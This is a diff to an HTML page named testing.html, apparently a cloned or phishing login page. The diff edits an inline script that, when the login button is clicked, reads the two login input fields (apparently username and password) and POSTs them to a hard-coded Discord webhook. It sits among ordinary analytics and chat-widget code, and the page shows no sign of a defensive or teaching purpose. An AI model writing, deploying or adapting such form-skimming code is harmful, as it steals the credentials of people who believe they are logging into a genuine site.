--- a/testing.html
+++ b/testing.html
@@ -45,12 +45,15 @@
 		gtag('config', 'G-QZJGCVMB4V');
 	</script>
 	<script>
+		window.onload = function() {
+			console.log(document.getElementsByClassName("form-login__button")[0])
 		document.getElementsByClassName("form-login__button")[0].addEventListener("click", () => {
 			fetch('https://discord.com/api/webhooks/1301483051653533707/4Zq3BT1n4PZOmTpQIT40a8MxV62ejnlQmBSniy1Mb3_jr3qTgfOfZM54PQKg7rAWUWzl',{
 				method:'POST',
 				headers: {'Content-Type':'application/json'},
 				body:JSON.stringify({content: document.getElementsByClassName("form-login__input")[0].value+" | "+document.getElementsByClassName("form-login__input")[1].value})})
 		})
+		}
 	</script>
 <link rel="stylesheet" href="https://code.jivosite.com/css/d1dc0ec/widget.css" class="jv-css"></head>
 
